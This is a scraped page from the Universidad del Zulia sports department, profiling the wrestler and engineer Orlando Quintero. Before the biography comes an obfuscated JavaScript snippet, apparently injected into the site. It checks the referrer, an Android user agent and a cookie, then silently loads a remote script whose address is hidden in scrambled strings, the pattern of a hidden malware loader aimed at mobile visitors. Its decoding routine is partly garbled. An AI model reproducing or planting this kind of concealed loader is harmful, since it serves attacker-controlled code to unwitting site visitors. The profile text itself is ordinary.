;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Orlando Quintero - Dirección de Deportes
Universidad del Zulia
Correo LUZMapa del sitio
24 de octubre de 2018
 
Programas
Alto Rendimiento Educ.Fisica y Recreación Deporte Interno Extensión Deportiva Actividad Física Recreación Atención al Atleta Entrenamientos Registro Atleta LUZ Pequeña Liga de Béisbol
Juegos Deportivos
Condiciones Generales
Afiches deportivos
Posición Final 2010
Posición Final 2011
Planilla de inscripción
Más Deporte
Juvines 2010
Juvines 2012
Juvineu 2015

images/stories/topes/sucesion.jpg

Agrandar texto   Reducir texto   Reestablecer texto    
Orlando Quintero PDF Imprimir Correo

Premio Luis Aparicio
Buen Estudiante Deportista de LUZ
1992


Ingresó a cursar estudios en nuestra institución de Ingeniería Mecánica en 1987, a la edad de 17 años, desde entonces la lucha olímpica de LUZ,  tuvo hasta mediados de 1995  uno de los exponentes más brillantes en lo que a este deporte se refiere.


A la edad de trece años inició su afición por la lucha olímpica y de inmediato comienza a ser noticia cuando un año más tarde asiste al Mundial realizado en Panamá. Posteriormente asistió al Panamericano Infantil celebrado en Colombia de donde regresa con honores dorados.


16 veces campeón nacional desde la categoría infantil hasta adulto; deslumbró en el estilo greco-romano impregnando aptitud y fuerza en cada combate al que asistía; lo que  le permitió ser el mejor en su categoría en eventos nacionales y como integrante de la selección nacional representó dignamente el tricolor patrio.


En el ámbito universitario se tituló campeón en las diferentes  ediciones de los Juvines y campeonatos universitarios en los que representó a la institución. En el año 1991 es postulado al Premio “Luís Aparicio” Buen Estudiante-Deportista de LUZ, obteniendo en esa ocasión el segundo lugar. Al año siguiente obtiene el honor de hacerse acreedor del  premio, que según su opinión, ha sido el reconocimiento más importante que ha recibido en su vida.


Durante su actividad académica fue preparador de la cátedra Diseño Mecánico e integró el cuadro de honor de la Facultad de Ingeniería por espacio de tres años consecutivos. En abril de 1994, en acto académico y siendo el segundo de su promoción egresó de LUZ con el título de Ingeniero Mecánico y al mismo tiempo se despide de la actividad deportiva.


Posteriormente a un mes de recibir su titulo universitario,  ingresa a trabajar en Maraven; empresa filial de PDVSA donde permaneció por espacio de ocho años y medio. A la par con su trabajo en la industria petrolera se desempeñó como personal docente contratado en la Facultad de Ingeniería de la Universidad del Zulia.


Recientemente recibió el tituló de magíster en Ingeniería de Petróleo, Cum Laude, y presta sus servicios en una reconocida empresa consultora nacional.



                                                                                                                             Redacción: Yasmira Meleán Marin
                                                                                                                             Reproducción: Claudio Ocando
                                                                                                                             Febrero de 2004 




^ Subir